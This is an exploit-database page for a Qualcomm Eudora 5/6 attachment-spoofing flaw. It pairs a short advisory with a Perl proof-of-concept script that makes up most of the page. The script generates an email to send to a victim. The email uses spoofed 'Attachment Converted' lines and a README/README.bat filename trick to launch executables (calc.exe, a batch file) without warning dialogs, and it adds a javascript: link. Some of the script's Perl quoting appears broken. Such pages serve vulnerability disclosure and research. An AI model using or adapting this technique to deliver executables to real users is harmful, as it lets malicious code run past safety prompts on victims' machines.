Exploit Qualcomm Eudora 5/6 - File Attachment Spoofing (2)


18 Дек 2022
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source: https://www.securityfocus.com/bid/5432/info
Eudora is reported to be prone to an issue which may allow attackers to spoof the file extension in an attachment. This may aid an attacker in enticing a user of the e-mail client into executing malicious content, and in avoiding generating warning messages.
It is possible to refer to other files or attachments in a message through specially formatted inline text. It has been demonstrated possible to misrepresent some aspects of files referenced in this manner. This may cause end users to make erroneous judgements about the nature of file attachments, and allow malicious attachments to bypass normal warning dialogs displayed when executable content is launched.
If an attachment path to an executable file has a single '.' character appended, warning messages will not be displayed. Attachments such as 'calc.exe.' may execute when launched without the requirement for further interaction. Additionally, an arbitrary file name may be specified by the attacker which will be displayed to the end user. If a filename such as 'readme.txt' is associated with a malicious, executable attachment, the user may make innacurate decisions about the risk associated with opening the attachment. If the specified file does not exist on the local system, the full path provided will be used to locate and launch a file, with no further warnings given.
Successful exploitation may require the attacker to know the full path to the attachment directory.
** A new version of Eudora is available however, reports suggest that the new version may still be affected.
** May 21, 2004 - Eudora version 6.1.1 has been released, however, it is reported that the new versions is vulnerable to this issue as well.

#!/usr/bin/perl --

use MIME::Base64;

print "From: me\n";
print "To: you\n";
print "Subject: Eudora 6.1.1 on Windows spoof, LaunchProtect\n";
print "MIME-Version: 1.0\n";
print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
print "X-Use: Pipe the output of this script into:  sendmail -i victim\n\n";
print "This is a multi-part message in MIME format.\n";
print "--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

print "With spoofed attachments, we could 'steal' files if the message
was forwarded (not replied to).\n";

#print "
#(Within plain-text email (or plain-text, inline MIME parts) embedded
#CR=x0d characters used to get converted internally into a NUL=x00 and
#ignored, so we could spoof \"attachment converted\" lines.
#At version 6.1.1, embedded CR seem to get converted into NL=x0a.)\n";

print "\nThe <x-xyz></x-xyz> constructs (x-html, x-rich or x-flowed)
allow spoofing attachments easily.
The following work fine (but put up warnings):\n";
print "<x-html></x-html>Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";
print "<x-html></x-html>Attachment Converted: c:\\winnt\\system32\\calc.exe\n";
print "<x-html></x-html>Attachment Converted: <a href=c:/winnt/system32/calc.exe>file.exe</a>\n";
print "These have broken icons, but execute without warning:\n";
print "<x-html></x-html>Attachment Converted: \"c:\\winnt\\system32\\calc\"\n";
print "<x-html></x-html>Attachment Converted: c:\\winnt\\system32\\calc\n";
print "<x-html></x-html>Attachment Converted: <a href=c:/winnt/system32/calc>file</a>\n";

print "\n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file.exe</a>
(get warning)
<a href=c:/winnt/system32/calc>plain file</a>
(no warning) references.
<br>(Or can do
<a href=\"http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx\">http</a>
<a href=\"javascript:alert(\x27hello\x27)\">javascript</a>
references; the latter
<br>seems to run with IE, regardless of default browser settings.).

print "\n\n<x-rich>
Can also do RTF inclusions. Can that be abused?

print "\n--zzz\n";
print "Content-Type: text/plain; name=\"b64.txt\"\n";
print "Content-Transfer-Encoding: base64\n";
print "Content-Disposition: inline; filename=\"b64.txt\"\n";
print "\n";
$z = "Can no longer spoof attachments in quoted-printable parts, but\r
still can within base64 encoded (plain-text, inline) MIME parts:\r
Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\r
Attachment Converted: \"c:\\winnt\\system32\\calc\"\r\n";
print encode_base64($z);

print "\n--zzz\n";
print "Content-Type: text/plain\n";
print "Content-Transfer-Encoding: 7bit\n";
print "\n";

$X = 'README'; $Y = "$X.bat";
print "\n\n\nThe X - X.exe dichotomy: send a plain $X attachment:\n";
$z = "rem Funny joke\r\npause\r\n";
print "begin 600 $X\n", pack('u',$z), "`\nend\n";
print "\nand (in another message or after some blurb so is scrolled off in
another screenful) also send $Y. Clicking on $X does not
get it any more, but gets $Y and runs without any warning:\n";
$z = "rem Big joke\r\nrem Should do something nasty\r\npause\r\n";
print "begin 600 $Y\n", pack('u',$z), "`\nend\n";

#print "\nIf we can guess the full path to the attach directory then can
#change the name shown to anything we like, but get broken icon:\n";
#print "<x-html></x-html>Attachment Converted: attach\\README\n";
#print "<x-html></x-html>Attachment Converted: <a href=H:/windows/.eudora/attach/README>file.txt</a>\n";

#print "\nFunny: I thought that since version 6.0, LaunchProtect handled
#the X-X.exe dichotomy (in the attach directory only)...\n";

print "\n";
print "\n--zzz--\n";
print "\n";

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